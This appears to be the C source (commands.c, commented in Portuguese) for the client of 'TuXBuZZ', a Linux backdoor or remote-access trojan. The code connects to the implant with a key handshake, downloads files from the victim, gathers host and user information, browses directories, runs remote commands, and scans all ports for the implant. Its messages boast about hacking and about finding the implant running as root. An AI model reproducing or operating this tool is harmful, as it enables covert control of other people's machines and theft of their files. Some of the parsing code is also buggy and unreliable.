/**************************************************************************
TuXBuZZ - DoC#include
commands.c
**************************************************************************/

#include "commands.h"
#include "messages.h"
#include "tuxbuzzpackage.h"


#include <sys/time.h>

/*-------------------------------------------------------------------------- 
extrai o primeiro token da linha de comando e chama o comando adequado
passando o resto da linha como argumentos do comando, ex:
connect 127.0.0.1 --> pega "connect" como comando e passa " 127.0.0.1"
como argumento para process_cmd_connect()
---------------------------------------------------------------------------*/


int parse_cmd(char* cmd) 
{
   char* cmdptr = cmd;  

  while(*cmdptr=='\t' || *cmdptr==' ')
    ++cmdptr;
  
  if(!strncmp(cmdptr,"quit",4)){
    process_cmd_quit();
    
  }else if(!strncmp(cmdptr,"connect",7)){
    
    cmdptr+=7;
    process_cmd_connect(cmdptr);
    return MSG_CONNECT;
  }else if(!strncmp(cmdptr,"get",3)){
    
    cmdptr+=3;
    process_cmd_get(cmdptr);
    return MSG_GET;
  }else if(!strncmp(cmdptr,"close",5)){
    if(!process_cmd_close())
      fprintf(stdout,"connection closed. %d bytes sended, %d bytes
received.\n",bytessended,bytesreceived);
    else
      fprintf(stdout,"close error: no active connection\n");
    return MSG_DISCONNECT;
  }else if(!strncmp(cmdptr,"rinfo",5)){
    cmdptr+=5;
    process_cmd_rinfo(cmdptr);
    return MSG_RINFO;
  }else if(!strncmp(cmdptr,"help",4)){
    process_cmd_help();
    return MSG_HELP;
}
else if(!strncmp(cmdptr,"scan",4)){
  cmdptr+=4;
  process_cmd_scan(cmdptr);
  return MSG_SCAN;
}else if(!strncmp(cmdptr,"ls",2)){
        cmdptr+=2;
        process_cmd_ls(cmdptr);
        return MSG_LS;
}else if(!strncmp(cmdptr,"cd",2)){
        cmdptr+=2;
        process_cmd_cd(cmdptr);
        return MSG_CHDIR;
}else if(!strncmp(cmdptr,"pwd",3)){
        process_cmd_pwd();
        return MSG_PWD;
}else if(!strncmp(cmdptr,"exec",4)){
        cmdptr+=4;
        process_cmd_exec(cmdptr);
        return MSG_EXEC;
}else if(!strncmp(cmdptr,"!",1)){
        cmdptr++;
        process_local_shell_cmd(cmdptr);
        return MSG_LOCAL_SHELL_CMD;  
    }
  return -1;
}



/*----------------------------------------------------------------------------
faz a conexao com o servidor 
 ---------------------------------------------------------------------------*/

int process_cmd_connect(char *cmdargs)
{
  char *cmdargsptr = cmdargs;
  char *ipaddrarg = NULL;
  char *portarg = NULL;
  int bytes;
  struct TuxbuzzPackage pack;
  
  if(connected) return -1;

  while(*cmdargsptr=='\t' || *cmdargsptr==' ')
    ++cmdargsptr;

  if(!strlen(cmdargsptr))
    return -1;
  
  ipaddrarg = cmdargsptr;

  while(*cmdargsptr!='\t' && *cmdargsptr!=' ' && *cmdargsptr)
    ++cmdargsptr;

  if(strlen(cmdargsptr)){
    *cmdargsptr++=0;
    
		while(*cmdargsptr=='\t' || *cmdargsptr==' ')
			++cmdargsptr;
		portarg = cmdargsptr;
    port = atoi(portarg);
}
  
   
  
if((sockfd = socket(AF_INET,SOCK_STREAM,0))<0)
    {
      fputs("connect: socket\n",stdout);
      return -1;
}

  bzero(&addr,sizeof(addr));

  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = inet_addr(ipaddrarg);

  if((connect(sockfd,(struct sockaddr*) &addr,sizeof(addr)))<0){
    fputs("connect: connect\n",stdout);
    return -1;
  }
  
  bzero(&pack,sizeof(struct TuxbuzzPackage));
  strncpy(pack.data,TUXBUZZKEY_CLIENT,24);

 fprintf(stdout,"connected to %s on port %d\n",inet_ntoa(addr.sin_addr)
,ntohs(addr.sin_port));
  send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  recv(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  if(strncmp(pack.data,TUXBUZZKEY_SERVER,24)){
  close(sockfd);
  fprintf(stdout,"Dont a TuXBuZZ Server\n");
  return -1;
  }
  
  if(pack.message)
    fprintf(stdout,"Wellcome to TuxBuZZ server "
    VERSION" (not running as root)\n");
  else{
    fprintf(stdout,"      OWWWWWWWW SHIIIIIIIIT !!!!!!!!! "
    "NoT OnLY WinDoZe can bE HacKed.\n"
    "Wellcome to TuxBuZZ Server " VERSION" running as ROOT !!!\n"
    "Good Luck !\n"
    );
  }
  fflush(stdout);
  connected = 1;


  return 0;
}



/* --------------------------------------------------------------------------- 
baixa um arquivo do servidor para a maquina do cliente 
-----------------------------------------------------------------------------*/

int process_cmd_get(char *cmdargs)
{
  char *remotefile,*localfile;
  int localfilefd; /* descritor do arquivo local */
  struct TuxbuzzPackage pack;
  int bytes;
	
	/* se nao for fornecido um nome para o arquivo local, ele sera enviado para a saida padrao */
	int echoefile = 0; 

	int filesize=0; /* vai dar o tamanho do arquivo */
  char *cmdargsptr = cmdargs;
  while(*cmdargsptr=='\t' || *cmdargsptr==' ')
    ++cmdargsptr;
  
  if(!strlen(cmdargsptr))
    return -1;

  remotefile = cmdargsptr;

	while(*cmdargsptr!='\t' && *cmdargsptr!=' ' && *cmdargsptr)
		++cmdargsptr;

	if(strlen(cmdargsptr))	
		*cmdargsptr++='\0';
	

 while(*cmdargsptr=='\t' || *cmdargsptr==' ')
		++cmdargsptr;

	localfile = cmdargsptr;
	
	
/* se nao foi fornecido um nome para o arquivo local, o arquivo remoto sera enviado diretamente para a saida padrao */
if(!strlen(localfile)) 
			echoefile=1; 

/* a funcao retorna erro se nao puder criar o arquivo local */	
if(!echoefile)	
		if((localfilefd=open(localfile,O_WRONLY | O_CREAT))==-1){
				fprintf(stdout,"error: could not create file %s\n",localfile);		
				return -1;}
 
	bzero(&pack,sizeof(struct TuxbuzzPackage));
  pack.message = MSG_GET;
  
  
  bytes=send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  bytessended+=bytes; 
	bytes=recv(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
 	bytesreceived+=bytes; 
	
	if(pack.message==MSG_CONTINUE){
    bzero(&pack,sizeof(struct TuxbuzzPackage));
    strncpy(pack.data,remotefile,strlen(remotefile));
    bytes=send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  	bytessended+=bytes;  


for(;;){
	bzero(&pack,sizeof(struct TuxbuzzPackage));
	recv(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
	if(pack.message>0){
		filesize+=pack.message;
		if(!echoefile)
			write(localfilefd,pack.data,pack.message);
		else
			fprintf(stdout,"%s",pack.data);
	pack.message = MSG_CONTINUE;
	send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
}else if(pack.message==0){pack.message=MSG_STOP;send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);break;} 
else if(pack.message==-1){pack.message=MSG_STOP;send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
fprintf(stdout,"error: remote file don't exists\n");return(-1);}
}
if(!echoefile)
	close(localfilefd);
}
bytesreceived+=filesize;

fprintf(stdout,"downloaded file %s as %s (%d bytes total)\n",
remotefile,localfile,filesize);

return 0;
}


int process_cmd_close()
{
  struct TuxbuzzPackage pack;
  int bytes;  
if(!connected) return -1;
  bzero(&pack,sizeof(struct TuxbuzzPackage));
  pack.message = MSG_DISCONNECT;
  bytes = send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  bytessended+=bytes;

  close(sockfd);
  connected = 0;
  
  return 0;
}

int process_cmd_rinfo(char *cmdargs)
{
  char *cmdargsptr = cmdargs;
  char *arg;
  int bytes;
  struct TuxbuzzPackage pack;
  struct utsname machine; /* para receber informacoes basicas da maquina servidor */
  
  while(*cmdargsptr=='\t' || *cmdargsptr==' ')
    ++cmdargsptr;
  
  
  if(!strlen(cmdargsptr))
    return -1;
    
  arg = cmdargsptr;
  
  
  while(*arg!='\t' && *cmdargsptr!=' ' && *cmdargsptr)
    ++cmdargsptr;
    
  if(!strlen(arg))
    return -1;
  
  *cmdargsptr++='\0';
  
  
  
  if(!strncmp(arg,"remote",6)){
    if(!connected) return -1;
    bzero(&pack,sizeof(struct TuxbuzzPackage));
    pack.message = MSG_RINFO_REMOTE;
    bytes = send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
    bytessended+=bytes;
    bytes = recv(sockfd,&machine,sizeof(machine),0);
    bytesreceived+=bytes;
    fprintf(stdout,"OS: %s
Machine Name: %s
Release: %s
Version: %s
Machine: %s\n",machine.sysname
,machine.nodename,machine.release,machine.version,machine.machine);
} else 
  if(!strncmp(arg,"user",4)){
    char userinfostr[1024];
    bzero(userinfostr,1024);
    if(!connected) return -1;
    pack.message = MSG_RINFO_USER;
    bytes = send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
    bytessended+=bytes;
    bytes = recv(sockfd,userinfostr,1024,0);
    bytesreceived+=bytes;
   fprintf(stdout,"%s",userinfostr);
   } 


  return 0;
}

int process_cmd_help()
{
  fputs(usage,stdout);
  return 0;
}

void process_cmd_quit()
{
if(connected) /* se estiver conectado, encerra a conexao */
	process_cmd_close();
exit(0);
}


int process_cmd_scan(char *cmdargs)
{
  char *cmdargsptr = cmdargs;
  char *ipaddrarg = NULL;
  int bytes =0;
  struct TuxbuzzPackage ackpack,rackpack;
  int scanport = 0;
  
  struct timeval tv;
  fd_set readfs;
  
  
  
  if(connected){
  fprintf(stdout,"Allready connected. Disconnect Before trying to do a scan.\n");
  return -1;
}
  
  while(*cmdargsptr=='\t' || *cmdargsptr==' ')
    ++cmdargsptr;

  if(!strlen(cmdargsptr))
    return -1;
  
  ipaddrarg = cmdargsptr;

  while(*cmdargsptr!='\t' && *cmdargsptr!=' ' && *cmdargsptr)
    ++cmdargsptr;

  if(strlen(cmdargsptr))
    *cmdargsptr=0;
    
	bzero(&ackpack,sizeof(struct TuxbuzzPackage));	
  strncpy(ackpack.data,TUXBUZZKEY_CLIENT,24);   
    
    
    fprintf(stdout,"scaning %s...\n",ipaddrarg);
fflush(stdout);  
   
while(scanport<=65000){
   bzero(&addr,sizeof(addr));
   addr.sin_port = htons(scanport);
   addr.sin_family = AF_INET;
   addr.sin_addr.s_addr = inet_addr(ipaddrarg);
   
   
  
   if((sockfd = socket(AF_INET,SOCK_STREAM,0))<0)
    {
      fputs("connect: socket\n",stdout);
      fflush(stdout);
      perror("socket !!!!!");
      return -1;
    }
   
      
   
   if((connect(sockfd,(struct sockaddr*) &addr,sizeof(addr)))<0){
    ++scanport;

    close(sockfd);
    continue;
  }
  
  send(sockfd,&ackpack,sizeof(struct TuxbuzzPackage),0);
  bzero(&rackpack,sizeof(struct TuxbuzzPackage));
  
  tv.tv_sec = 1;
  FD_ZERO(&readfs);
  FD_SET(sockfd,&readfs);
  bytes=select(sockfd+1,&readfs,NULL,NULL,&tv);
  if(!FD_ISSET(sockfd,&readfs))
  {
close(sockfd);continue;  
}
    fprintf(stdout,"lendo...(%d)\n",bytes);
    bytes=recv(sockfd,&rackpack,sizeof(struct TuxbuzzPackage),0);
  fprintf(stdout,"lixo:%s",rackpack.data);  
 
  
  if(strncmp(rackpack.data,TUXBUZZKEY_SERVER,24)){
  close(sockfd);
  ++scanport;
  continue;
  }
  if(rackpack.message){
    fprintf(stdout,"Wellcome to TuxBuZZ server "
    VERSION" (not running as root)\n");
  port = scanport;connected = 1;fflush(stdout);return 0;  
  }
  else{
    fprintf(stdout,"      OWWWWWWWW SHIIIIIIIIT !!!!!!!!! "
    "NoT OnLY WinDoZe can bE HacKed.\n"
    "Wellcome to TuxBuZZ Server " VERSION" running as ROOT !!!\n"
    "Good Luck !\n"
    );
port = scanport;connected=1;fflush(stdout);return 0;  
}
}
  fflush(stdout);
  


  return -1;
}


int process_cmd_ls(char *cmdargs)
{
struct TuxbuzzPackage pack;
int bytes;

bzero(&pack,sizeof(struct TuxbuzzPackage));
pack.message = MSG_LS;

bytes=send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
bytessended+=bytes;

for(;;){
	bzero(&pack,sizeof(struct TuxbuzzPackage));
	recv(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
	if(pack.message>0){
		fprintf(stdout,"%s",pack.data);
	  pack.message = MSG_CONTINUE;
	  send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  }else if(pack.message==0){pack.message=MSG_STOP;send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);break;} 
else if(pack.message==-1){pack.message=MSG_STOP;send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
fprintf(stdout,"error: ls\n");return(-1);}
}


return 0;

}

int process_cmd_cd(char *cmdargs)
{
struct TuxbuzzPackage pack;
char *cmdargsptr = cmdargs;
while(*cmdargsptr=='\t' || *cmdargsptr==' ')
    ++cmdargsptr;

bzero(&pack,sizeof(struct TuxbuzzPackage));
pack.message = MSG_CHDIR;
strcpy(pack.data,cmdargsptr);
send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
recv(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
fprintf(stdout,"Current working directory now: %s (%d)\n",pack.data,strlen(pack.data));
return 0;
}

int process_cmd_pwd(char *cmdargs)
{
  struct TuxbuzzPackage pack;
  pack.message = MSG_PWD;
  send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  bzero(&pack,sizeof(struct TuxbuzzPackage));
  recv(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  fprintf(stdout,"%s\n",pack.data);
  return 0;
}

int process_cmd_exec(char *cmdargs)
{
char* cmd = cmdargs;
struct TuxbuzzPackage pack;

while(*cmd=='\t' || *cmd==' ')
  ++cmd;
  
if(!strlen(cmd)) 
  return -1;
  bzero(&pack,sizeof(struct TuxbuzzPackage));
  pack.message = MSG_EXEC;
  strcpy(pack.data,cmd);
  send(sockfd,&pack,sizeof(struct TuxbuzzPackage),0);
  return 0;
}


/* executa um comando pelo shell quando o primeiro caractere
da linha de comando e um "!" (como no  micq)*/

int process_local_shell_cmd(char *cmdargs)
{
char *cmd = cmdargs;
FILE* pipedesc;
char buff[1024];

while(*cmd=='\t' || *cmd==' ')
  ++cmd;

if(!strlen(cmd))
  return -1;
  
if((pipedesc=popen(cmd,"r"))==NULL)
  return -1;
  


while(!feof(pipedesc)){
  bzero(buff,1024);
  fread(buff,1024,1,pipedesc);
  fwrite(buff,strlen(buff),1,stdout);
  fflush(stdout);
}
  
pclose(pipedesc);
return 0;
}



/* fim de commands.c */
